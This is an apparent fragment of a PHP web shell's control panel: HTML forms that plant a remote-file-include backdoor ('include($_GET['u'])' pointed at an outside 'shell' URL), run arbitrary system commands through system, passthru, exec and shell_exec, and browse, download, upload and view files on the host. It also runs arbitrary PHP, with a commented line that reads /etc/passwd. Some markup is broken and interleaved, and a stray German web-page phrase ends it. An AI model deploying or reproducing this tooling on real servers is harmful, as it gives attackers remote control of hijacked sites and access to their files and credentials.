    <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
    <strong>
    <textarea name="codes" style="width: 353px; height: 89px" dir="ltr" cols
    ="20" rows="1">&lt;?php include($_GET['u'])?&gt;</textarea><br>
    <span lang="en-us"> file include </span>
    <br><span lang="en-us">www.site.com/file.php?u=http://shell</span></st
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
    <strong> ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
    <strong>
    <input name="pathclass" type="text" style="width: 284px" dir="ltr" valu
    e="<?php echo realpath('')?>/file.php"></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
    <input type="submit" value=""></strong></td>
    </tr>
    <input type="hidden" name="page" value="file_mysql">
    </form>

    <tr>
    <td valign="top" colspan="6">&nbsp;</td>
    </tr>
    <form method="POST" target="_blank">
    <tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>
    system - passthru - exec - shell_exec</strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong> ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
    <select name="att" dir="rtl" size="1">
    <?php
    if($_POST['att']==null)

    {
    echo '
    "">system</option>';
    }else{
    echo "
    cted=''>$_POST[att]</option>

    <option value="system" selected=


    <option value='$_POST[att]' sele
    <option value=system>system</opt

    ion>
    ";
    }
    ?>
    <option value="passthru">passthr
    u</option>
    <option value="exec">exec</optio
    n>
    <option value="shell_exec">shell
    _exec</option>
    </select>
    <strong>
    <input name="page" type="hidden" value="ccmmdd">
    <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la" di
    r="ltr"></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
    <input type="submit" value=""></strong></td>
    </tr>
    </form>
    <form method="POST" target="_blank">
    <tr>
    <td valign="top" colspan="6">&nbsp;</td>
    </tr>

    <tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong> ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
    <strong>
    <input name="pathclass" type="text" style="width: 284px" dir="ltr" value
    ="<?php echo realpath('')?>"></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
    <input type="submit" value=""></strong></td>
    </tr>
    <input name="page" type="hidden" value="showdir">
    </form>

    <form method="POST" target="_blank">


    <tr>
    <td valign="top" colspan="6">&nbsp;</td>
    </tr>

    <tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong> </strong><
    >

    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong> ~</strong></td
    <td valign="top" bgcolor="#151515" colspan="5">
    <strong>
    <input name="pathclass" type="text" style="width: 284px" dir="ltr" valu
    e="<?php echo realpath('')?>"></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
    <input type="submit" value=""></strong></td>
    </tr>
    <input name="page" type="hidden" value="download">
    </form>

    <form method="POST" target="_blank">


    <tr>
    <td valign="top" colspan="6">&nbsp;</td>
    </tr>

    <tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong> </strong><
    >

    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong> ~</strong></td
    <td valign="top" bgcolor="#151515" colspan="5">
    <strong>
    <input name="pathclass" type="text" style="width: 284px" dir="ltr" value
    ="<?php echo realpath('')?>"></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
    <input type="submit" value="" style="width: 36px"></strong></td>
    </tr>
    <input name="page" type="hidden" value="show">
    </form>

    <form method="POST" target="_blank" enctype="multipart/form-data">


    <tr>
    <td valign="top" colspan="6">&nbsp;</td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong> </strong></
    td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>File ~</stro
    ng></td>
    <td valign="top" bgcolor="#151515" colspan="5">
    <input name="img" type="file"></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</stro
    ng></td>
    <td valign="top" bgcolor="#151515" colspan="5">
    <strong>
    <input name="pathclass" type="text" style="width: 284px" dir="ltr" value
    ="<?php echo realpath('')?>"></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
    <input type="submit" value=""></strong></td>
    </tr>
    <input name="page" type="hidden" value="upload">

    </form>

    <form method="POST" target="_blank">


    <tr>
    <td valign="top" colspan="6">&nbsp;</td>
    </tr>

    <tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong> PHP</str
    /td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong> ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
    <strong>
    <textarea name="code" dir="ltr" style="width: 353px; height: 89px">echo
    '<center><b>PHP Working</b></center>';
    #readfile('/etc/passwd');
    </textarea>
    </strong>
    </td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
    <input type="submit" value="" style="height: 26px"></strong></td>
    </tr>
    <input name="page" type="hidden" value="code">
    </form>
    </table>
    </td>
    </tr>
    </table>

    Das könnte Ihnen auch gefallen